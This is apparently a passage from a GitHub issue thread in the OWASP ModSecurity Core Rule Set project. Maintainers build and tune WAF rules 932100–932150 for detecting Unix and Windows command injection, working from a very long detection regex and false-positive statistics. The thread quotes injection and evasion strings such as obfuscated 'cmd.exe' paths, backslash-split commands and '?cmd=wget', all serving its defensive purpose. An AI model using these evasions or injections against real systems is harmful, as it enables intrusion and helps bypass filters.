}t)?|t[\"\^]{0,2}l[\"\^]{0,2}e)|r[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}t|e[\"\^]{0,2}e)|y[\"\^]{0,2}p[\"\^]{0,2}e(?:[\"\^]{0,2}p[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}f)?|e[\"\^]{0,2}(?:l[\"\^]{0,2}n[\"\^]{0,2}e[\"\^]{0,2}t|e)|l[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}t)|e[\"\^]{0,2}(?:x[\"\^]{0,2}(?:p[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}r|a[\"\^]{0,2}n[\"\^]{0,2}d|o[\"\^]{0,2}r[\"\^]{0,2}t)|(?:t[\"\^]{0,2}r[\"\^]{0,2}a[\"\^]{0,2}c|i)[\"\^]{0,2}t|e[\"\^]{0,2}c|s[\"\^]{0,2}n)|(?:v[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}a[\"\^]{0,2}t|r[\"\^]{0,2}a[\"\^]{0,2}s)[\"\^]{0,2}e|n[\"\^]{0,2}d[\"\^]{0,2}l[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}a[\"\^]{0,2}l|p[\"\^]{0,2}(?:c[\"\^]{0,2}s[\"\^]{0,2}v|a[\"\^]{0,2}l|s[\"\^]{0,2}n)|(?:g[\"\^]{0,2}r[\"\^]{0,2}e|b)[\"\^]{0,2}p|c[\"\^]{0,2}h[\"\^]{0,2}o|t[\"\^]{0,2}s[\"\^]{0,2}n)|w[\"\^]{0,2}(?:(?:s[\"\^]{0,2}c[\"\^]{0,2}r[\"\^]{0,2}i[\"\^]{0,2}p|u[\"\^]{0,2}a[\"\^]{0,2}u[\"\^]{0,2}c[\"\^]{0,2}l|g[\"\^]{0,2}e)[\"\^]{0,2}t|i[\"\^]{0,2}n[\"\^]{0,2}(?:d[\"\^]{0,2}i[\"\^]{0,2}f[\"\^]{0,2}f|m[\"\^]{0,2}s[\"\^]{0,2}d[\"\^]{0,2}p|r[\"\^]{0,2}[ms])|h[\"\^]{0,2}(?:(?:e[\"\^]{0,2}r|i[\"\^]{0,2}l)[\"\^]{0,2}e|o[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}i)|e[\"\^]{0,2}v[\"\^]{0,2}t[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2}l|a[\"\^]{0,2}i[\"\^]{0,2}t[\"\^]{0,2}f[\"\^]{0,2}o[\"\^]{0,2}r|r[\"\^]{0,2}i[\"\^]{0,2}t[\"\^]{0,2}e|m[\"\^]{0,2}i[\"\^]{0,2}c|j[\"\^]{0,2}b)|n[\"\^]{0,2}(?:[iv]|e[\"\^]{0,2}t(?:[\"\^]{0,2}(?:s[\"\^]{0,2}(?:t[\"\^]{0,2}a[\"\^]{0,2}t|v[\"\^]{0,2}c|h)|c[\"\^]{0,2}a[\"\^]{0,2}t|d[\"\^]{0,2}o[\"\^]{0,2}m))?|t[\"\^]{0,2}(?:b[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}k[\"\^]{0,2}u[\"\^]{0,2}p|r[\"\^]{0,2}i[\"\^]{0,2}g[\"\^]{0,2}h[\"\^]{0,2}t[\"\^]{0,2}s)|s[\"\^]{0,2}(?:l[\"\^]{0,2}o[\"\^]{0,2}o[\"\^]{0,2}k[\"\^]{0,2}u[\"\^]{0,2}p|n)|b[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}t|m[\"\^]{0,2}(?:a[\"\^]{0,2}p|o)|c(?:[\"\^]{0,2}a[\"\^]{0,2}t)?|a[\"\^]{0,2}l|d[\"\^]{0,2}r|o[\"\^]{0,2}w)|f[\"\^]{0,2}(?:[cw]|o[\"\^]{0,2}r(?:[\"\^]{0,2}(?:f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e[\"\^]{0,2}s|e[\"\^]{0,2}a[\"\^]{0,2}c[\"\^]{0,2}h|m[\"\^]{0,2}a[\"\^]{0,2}t))?|r[\"\^]{0,2}e[\"\^]{0,2}e[\"\^]{0,2}d[\"\^]{0,2}i[\"\^]{0,2}s[\"\^]{0,2}k|i[\"\^]{0,2}n[\"\^]{0,2}d(?:[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}r)?|(?:s[\"\^]{0,2}u[\"\^]{0,2}t[\"\^]{0,2}i[\"\^]{0,2})?l|t(?:[\"\^]{0,2}(?:y[\"\^]{0,2}p[\"\^]{0,2}e|p))?|g[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}p)|i[\"\^]{0,2}(?:p[\"\^]{0,2}(?:c[\"\^]{0,2}(?:o[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}i[\"\^]{0,2}g|s[\"\^]{0,2}v)|a[\"\^]{0,2}l|m[\"\^]{0,2}o|s[\"\^]{0,2}n)|f[\"\^]{0,2}m[\"\^]{0,2}e[\"\^]{0,2}m[\"\^]{0,2}b[\"\^]{0,2}e[\"\^]{0,2}r|r[\"\^]{0,2}b(?:[\"\^]{0,2}(?:1(?:[\"\^]{0,2}[89])?|2[\"\^]{0,2}[012]))?|c[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2}s|m)|(?:w[\"\^]{0,2}m[\"\^]{0,2})?i|e[\"\^]{0,2}x|h[\"\^]{0,2}y|s[\"\^]{0,2}e|d)|a[\"\^]{0,2}(?:d[\"\^]{0,2}(?:d[\"\^]{0,2}u[\"\^]{0,2}s[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}s|m[\"\^]{0,2}o[\"\^]{0,2}d[\"\^]{0,2}c[\"\^]{0,2}m[\"\^]{0,2}d)|s[\"\^]{0,2}s[\"\^]{0,2}o[\"\^]{0,2}c(?:[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}t)?|t[\"\^]{0,2}t[\"\^]{0,2}r[\"\^]{0,2}i[\"\^]{0,2}b|l[\"\^]{0,2}i[\"\^]{0,2}a[\"\^]{0,2}s|r[\"\^]{0,2}p)|b[\"\^]{0,2}(?:(?:c[\"\^]{0,2}d[\"\^]{0,2}(?:b[\"\^]{0,2}o[\"\^]{0,2}o|e[\"\^]{0,2}d[\"\^]{0,2}i)|r[\"\^]{0,2}o[\"\^]{0,2}w[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a)[\"\^]{0,2}t|i[\"\^]{0,2}t[\"\^]{0,2}s[\"\^]{0,2}a[\"\^]{0,2}d[\"\^]{0,2}m[\"\^]{0,2}i[\"\^]{0,2}n|o[\"\^]{0,2}o[\"\^]{0,2}t[\"\^]{0,2}c[\"\^]{0,2}f[\"\^]{0,2}g)|q[\"\^]{0,2}(?:p[\"\^]{0,2}r[\"\^]{0,2}o[\"\^]{0,2}c[\"\^]{0,2}e[\"\^]{0,2}s[\"\^]{0,2}s|w[\"\^]{0,2}i[\"\^]{0,2}n[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a|g[\"\^]{0,2}r[\"\^]{0,2}e[\"\^]{0,2}p|u[\"\^]{0,2}e[\"\^]{0,2}r[\"\^]{0,2}y)|l[\"\^]{0,2}(?:[ps]|o[\"\^]{0,2}g[\"\^]{0,2}(?:e[\"\^]{0,2}v[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}t|t[\"\^]{0,2}i[\"\^]{0,2}m[\"\^]{0,2}e|m[\"\^]{0,2}a[\"\^]{0,2}n|o[\"\^]{0,2}f[\"\^]{0,2}f)|a[\"\^]{0,2}b[\"\^]{0,2}e[\"\^]{0,2}l)|h[\"\^]{0,2}(?:o[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}n[\"\^]{0,2}a[\"\^]{0,2}m[\"\^]{0,2}e|i[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}o[\"\^]{0,2}r[\"\^]{0,2}y|e[\"\^]{0,2}l[\"\^]{0,2}p)|u[\"\^]{0,2}(?:n[\"\^]{0,2}(?:r[\"\^]{0,2}a[\"\^]{0,2}r|z[\"\^]{0,2}i[\"\^]{0,2}p)|s[\"\^]{0,2}r[\"\^]{0,2}s[\"\^]{0,2}t[\"\^]{0,2}a[\"\^]{0,2}t)|o[\"\^]{0,2}(?:p[\"\^]{0,2}e[\"\^]{0,2}n[\"\^]{0,2}f[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}e[\"\^]{0,2}s|g[\"\^]{0,2}v|h)|x[\"\^]{0,2}c[\"\^]{0,2}(?:a[\"\^]{0,2}c[\"\^]{0,2}l[\"\^]{0,2}s|o[\"\^]{0,2}p[\"\^]{0,2}y)|v[\"\^]{0,2}(?:e[\"\^]{0,2}r(?:[\"\^]{0,2}i[\"\^]{0,2}f[\"\^]{0,2}y)?|o[\"\^]{0,2}l)|j[\"\^]{0,2}a[\"\^]{0,2}v[\"\^]{0,2}a|k[\"\^]{0,2}i[\"\^]{0,2}l[\"\^]{0,2}l|7[\"\^]{0,2}z(?:[\"\^]{0,2}[ar])?|z[\"\^]{0,2}i[\"\^]{0,2}p)(\.\w+)?\b" \
    "msg:'Remote Command Execution: Windows Command Injection',\
    phase:request,\
    rev:'3',\
    ver:'OWASP_CRS/3.0.0',\
    maturity:'9',\
    accuracy:'8',\
    capture,\
    t:none,\
    ctl:auditLogParts=+E,\
    block,\
    id:932110,\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-windows',\
    tag:'attack-rce',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    tag:'PCI/6.5.2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    severity:'CRITICAL',\
    setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.rce_score=+%{tx.critical_anomaly_score},\
    setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{matched_var_name}=%{tx.0}"

The regexp is not 100% accurate yet. Some tests are failing. I'm just testing the concept. Performance tests not done, but it doesn't feel slow. No complaints from Apache about the long lines.

Here is the improvement on false positives on the Reddit comments. The FP rate has already gone down a lot. Lots of remaining FPs are due to direct RCE with dictionary terms - comments starting with For, While etc. Note that the old pmf rule did not even catch these.

Request Scores	pmf	regexp v0
0	81239	115642
5	42998	7452
10	1847	3005
15	211	177
20	16	33
25	6	5
30	1	4
35	2	0
40	0	1

Rule hits with pmf (before):

Rule ID	Hits	Explanation
`932100`	44203	Remote Command Execution (RCE) Attempt

Rule hits with regexp v0 (after):

Rule ID	Hits	Explanation
`932100`	5072	Remote Command Execution: Unix command injection
`932110`	5874	Remote Command Execution: Windows Command Injection

Finally I've added some tests from fuzzdb and audit logs. Need to add more!

Before proceeding to finetune the approach, the main question is, are we all on board with adding a regexp of this complexity to the CRS?

(Edit: removed very long test output from this post, see os-commands.txt for updated testcases.)

@lifeforms, it all depends on the description which comes with this rule. All I ask for is a detailed explanation of the regex and the one-liner used to generate it. The user has to be able to re-create the regex herself. If that is granted, I am totally on board.

You said it's only a proof of concept. So I am looking forward to its final implementation.

FP is probably the most important issue, so I did some more FP experiments on the Reddit comments:

First, I ran CRS3 at PL1 without the RCE rules, to demonstrate the base rate of false positives caused by all other CRS rules. It's important to know this number, because the total FP rate will never go below that percentage.
I ran the new regexps, but restricted them so they only test proper shell injections (e.g. a command after ; char like ;id) and not direct RCE vulnerabilities (command at the start of payload, like id).
I ran the above, but in addition, made the Unix rule case-sensitive (no more Cat).
I ran the above, but in addition, disabled the Windows rule.

False positive rates on Reddit comments:

Variant	RCE coverage	False positives
CRS3 without RCE rules	none	2.3%
"Before" situation using pmf	301 unix/win, injection + case	35.6%
v0: Assembled regexps	267 unix+384 win, injection + case + direct	8.5%
v0.1: Check only inject char	267 unix+384 win, injection + case	5.3%
v0.2: Unix case-sensitive	267 unix+384 win, injection	4.8%
v0.3: Unix only	267 unix, injection + case	4.1%
v0.4: Unix only, case-sensitive	267 unix, injection	2.8%

So:

The rest of the CRS already gives 2.3% FP. As said earlier, this is almost all due to 942250 (SQL HAVING...). Not happy with that, but that's another issue.
People who run the full regexps would suffer 8.5% FP. This is still very high in my opinion and unsuited for PL1.
If at PL1 we only check true injections, plus we check Unix injections case-sensitively, we have already reduced the false positives to 4.8%. This would get rid of a lot of possibly problematic FP like ?orderby=id and ?subject=For my dear father. I think it may not be worth blocking those cases in PL1, but we might introduce a sibling rule which still checks for some stuff like curl and wget at the beginning of a payload.
Windows keywords give relatively many FP, as I expected. A Unix admin (who could whitelist the Windows platform rules) on PL1 would be at 2.8% FP. In that situation, the Unix admin is already very much near the baseline FP rate of 2.3%, so their false positives on forum comments would only be raised by 0.5 percentage points relative to the rest of the CRS. This looks quite acceptable.

I will have to analyze the matched data to see if we can push the numbers down significantly by excluding some lower-value keywords. However, this could be a tricky task. But I bet there will be some low hanging fruit keywords that might knock off a bit of FP.

The regexp still needs to be fixed and tweaked, but I'm not expecting that to have significant impact on FP.

I tried out the t:cmdLine transformation, and it looks like it deals perfectly with all the escape characters, including ^. It's really great.

It seems a perfect fit for the Unix rule, because we can completely get rid of all the complex regexp character magic.

On the Windows rule it will destroy backslashes in the paths, so we'll get strings like C:WindowsSystem32cmd, which will not match. But, maybe we could make the Windows regexp more lax as to actually match such scenarios. Preventing kilobytes of weird regexps in the CRS could be worth it... But it's unsure what the effect on FP would be.

I wonder if we could get a t:cmdLineWin which would be identical to t:cmdLine but with the exception of

cmdLine: deleting all backslashes
cmdLineWin: deleting spaces before a backslash

(The deleting spaces is what cmdLine does with forward slashes.)

Not an immediate solution, but 2-3 years down the line, we would be very pleased.

Unfortunately my hopes of using t:cmdLine were crushed, as it replaces ; characters by spaces. So we can't see where many injections begin (such as foo.jpg;id). It's a very nice transformation when you know you're dealing with a command, but in our case I don't think it can be used. It also lowercases the string which we may or may not want.

I thought of a t:cmdLineWin and t:cmdLineUnix but I think this transformation does a bit too much. It would be better for rule writers to have a toolbox of generic transformations which can be parametrized. A thing we could have used here is something like t:replace:[\^\'\"\\]:. Such a system would also allow us to do complex replacements on other formats -- for instance you can remove /*comments*/ from code without adding a t:removeComments translation. This would be truly extensible and powerful.

But for now... In this case we can achieve the same result with regexps. It's just more tedious and ugly. And we'll have an 8kB regexp (Unix) plus a 10kB regexp (Windows) in the CRS. Maybe even siblings in higher PLs. :( But it will do. Once you find an evasion, you can't really ignore it...

Too bad. Yes, t:cmdLine is a bit a mingle-mangle. But it looked like the perfect fit at first sight. I thought about your dynamic transformation too. I think t:replace is hard to configure. But a repeatable (it's a transformation pipeline after all) t:tr... could be fairly simple. Does not cover your comments example though. As configurable transformations are a new concept, we might be shooting over the top and this is better done in LUA (which is not an option for CRS, though).

I agree, for the time being, we ought to go with the regex construct.

For me, the relevant number in your stats is the v0.2 as this will likely be the PL1 default setup. The 4.8% are really a lot. I hope you can shift some of the keywords away - or we might need special exceptions to weed out FPs.

I hope so too. I've now fixed the failing test cases by simplifying the regexp, reducing the rule sizes by about 20%. So my next action item is to look at the matched data and hopefully find some boring stuff that we can ignore!

Keeping my fingers crossed!

Informal performance testing shows that it takes about 1.3% longer to post the whole Reddit dataset (126k requests) when the two regexp rules are added in PL1.

RCE rules	Run 1	Run 2	Run 3	Average (s)	Slowdown
CRS3 without RCE rules	494.8	497.8	499.8	497.5	--
v0.2: Unix case-sensitive	501.0	503.1	507.5	503.9	1.3%

That's totally worth it and surprisingly a small addition.

@dune73 Mmm, I found it more than I had initially expected. I just timed the complete requests, not only the time spent in CRS. Adding 1.3% of server load for a rule seems a lot. Though this was a trivial test only requesting a small php script, if the web server really does work, the relative weight of CRS processing would be a smaller. Maybe the difference is just due to things like writing 5000 times to the audit log...

Hmm. Can you run with ModSec, but without any rules?

@dune73 Sure, but time is a bit compressed right now. I think performance is likely acceptable for the initial 3.0.0-rc1 but I'll keep it as a note to do a more thorough perf check later. (If it's problematic, we could do a trick like do a pre-filter on the special characters using a pmf rule for instance. But maybe it doesn't need to go into 3.0.0)

Good thinking.

Would that be (white)space, quotes and slashes? Or what do you have in mind?

For the pre-filter you mean? I thought maybe we can do a pre-check on special characters like ; & | { \r \n etc. If none of those characters are in the string, we might improve performance by skipping over the BIG regexp rules. But I'm not sure. The pre-check might even reduce performance: it's an extra check that costs more time in the worst case.

I've made some more improvements to the rules. I lowered FP a lot on the Reddit dataset by excluding some common English terms, and narrowed the regexps a bit.

Changes in v0.5:

Unix: removed for (163 hits; make this a specialized rule), which (79 hits), type (32 hits), cd (22 hits), open (6 hits), help (6 hits)
Windows: removed for (681 hits; specialized rule), oh (570 hits), now (559 hits), while (214 hits), cd (23 hits), title (12 hits), global (12 hits), help (11 hits), soon (5 hits), clear (5 hits), color (4 hits), choice (4 hits)
Windows: removed && || $( $(( ${ <( >( var=foo sequences from preamble since these are Unix shell specific
Unix: caught evasions with \ in path name, like ;\/\b\i\n\/\l\s
Windows: caught @ , based evasions like |@,,@,,@@,@@@,@@@@@@,(@@@, @@@ ,@, @,@(@ @@,@ @(@, @"c":\windows\system32\c^m^d.exe)))

False positive rates on Reddit comments:

The changes improved FP by a lot, most of which was caused by removal of English words.

Comparison with other approaches:

Variant	RCE coverage	False positives
CRS3 without RCE rules	none	2.3%
"Before" situation using pmf	301 unix/win, injection + case	35.6%
v0: Assembled regexps	267 unix+384 win, injection + case + direct	8.5%
v0.1: Check only inject char	267 unix+384 win, injection + case	5.3%
v0.2: Unix case-sensitive	267 unix+384 win, injection	4.8%
v0.5: Improved Unix case-sensitive	269 unix+373 win, injection	3.2%

Rule hits out of 126320 requests:

Rule ID	Hits	Explanation
`932100`	433	Remote Command Execution: Unix command injection
`932110`	1023	Remote Command Execution: Windows Command Injection

So the FP is now only 1.1% percentage point over the CRS3 base rate. When a user excludes the Windows rule, there are even just 433 Unix rule hits (0.3%) on 126k comments.

By the way, I noticed also that there are also quite some Reddit comments actually containing shell commands. So these numbers are an upper bound. That said, these rules will definitely cause some FP in practice, no doubt.

Command injection FP is now lowered by around 97% when compared to the pmf rule. That looks an acceptable rate to me for 3.0.0, and we didn't even have to remove too many keywords. The only compromises perhaps are the removal of cd and which commands, which allow an attacker to do some discovery of existing directories (through returned errors) and executables. The for command will have to be mitigated with a special rule though, since a for loop provides full execution.

What's next:

Next I'll try to add some additional smaller rules to catch special for cases (for is a notable command for Unix and Windows, but causes most FP in the normal word list). If time is left, also subshells and some Windows/Powershell stuff.

You can follow the progress in my rce-regexp-v0 branch.

I would very much appreciate review of the regexps and tests, especially the Windows ones, since I haven't used it in 10 years, so it's very likely that I am missing some stuff.

Here you can find the command injection tests I am currently using. I have no failing tests at this point. I really wish to add more, especially for Windows. If you have any access to Windows researchers, please ask them to look for more stuff and send me more obscure cmd/powershell syntax. This is the time to do it -- In three weeks the regexp will be out of my mind and it will be harder to edit it again.

Large update to the rce-regexp-v0 branch.

Unix coverage is improved a lot. I read a bash manual and added lots of bash/csh/sh keywords usable for execution and exfiltration. I improved the regexp against some possible evasions. This bigger keyword coverage is offset by more strict parsing of variable declarations. In total, FP has been lowered. FP is especially improved for content containing urls with query strings, which tended to trigger annoying false positives in the earlier version.

For Windows, I have added a pmf data file with PowerShell commands, cmdlets and common strings. This rule amazingly provided 0 FPs on the Reddit dataset, which is pretty funny, I guess nobody talked about PowerShell in 2007. But it's a good sign that normal conversation won't likely trigger this rule.

See the tests for examples.

I measured the performance of a pre-check on special characters. It made no difference.

Commix payloads seem to be covered, although this is more by chance -- I still want to have a specialized rule for for and if commands on Windows. They give huge FP when included, but they are very important for scripting.

Rule hits out of 126320 requests:

Rule ID	Hits	Explanation
`932100`	428	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found

Hits are still at 3.2% with injection checking, 2.3% for CRS3 without these rules.

My RCE branch has been updated. Most importantly:

Improved false negatives somewhat
Added rule 932130 to catch Unix shell expressions: $(foo), ${foo}, <(foo), >(foo), $((foo)). I didn't include foo because it hit many FP, however known commands after any of these markers are still being detected by rule 932100.
Added rule 932140 to catch Windows IF/FOR commands, for example:

FOR              %a IN (set) DO
FOR /D           %a IN (dirs) DO
FOR /F "options" %a IN (text|"text") DO
FOR /L           %a IN (start,step,end) DO
FOR /R C:\dir    %A IN (set) DO
IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n
IF [/I] [NOT] item1==item2
IF [/I] [NOT] item1   [EQU|NEQ|LSS|LEQ|GTR|GEQ] item2
IF [/I] [NOT] (item1) [EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2)

Rule hits on Reddit dataset:

Out of 126320 requests, hits are still at 3.2% with injection checking, 2.3% for CRS3 without these rules. Only a modest number of hits has been added by rules 932130-932140, mostly people talking about code. IF checking added a very small amount of FP, but it's low enough so I prefer not making the rule more complex.

Rule ID	Hits	Explanation
`932100`	428	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found
`932130`	15	Remote Command Execution: Unix Shell Expression Found
`932140`	27	Remote Command Execution: Windows FOR/IF Command Found

Tests are here. I think I'm almost done for PL1.

Another update and hopefully the last one.

Most importantly I've added rule 932150, which blocks Unix direct remote command execution (e.g. ?cmd=wget www.example.com). The command list of this rule has been restricted, and I require whitespace (denoting command parameters) or command separator character after the command. So, posting the string wget (but nothing else) as a parameter is legal. This approach seems to give an acceptable low amount of FP, with at least some protection.

Further I've done some cleanups to the regexps and word lists, and added comments to the rule file.

Reddit dataset metrics:

Of 126320 comments, still 3.2% have rule hits.

Rule ID	Hits	Explanation
`932100`	450	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found
`932130`	15	Remote Command Execution: Unix Shell Expression Found
`932140`	27	Remote Command Execution: Windows FOR/IF Command Found
`932150`	44	Remote Command Execution: Direct Unix Command Execution

I'm now ready to create a PR. Here is REQUEST-32-APPLICATION-ATTACK-RCE.conf. Unless I get comments, this will be the base of the PR.

Closing this, any further discussion is in #430

SpiderLabs / owasp-modsecurity-crs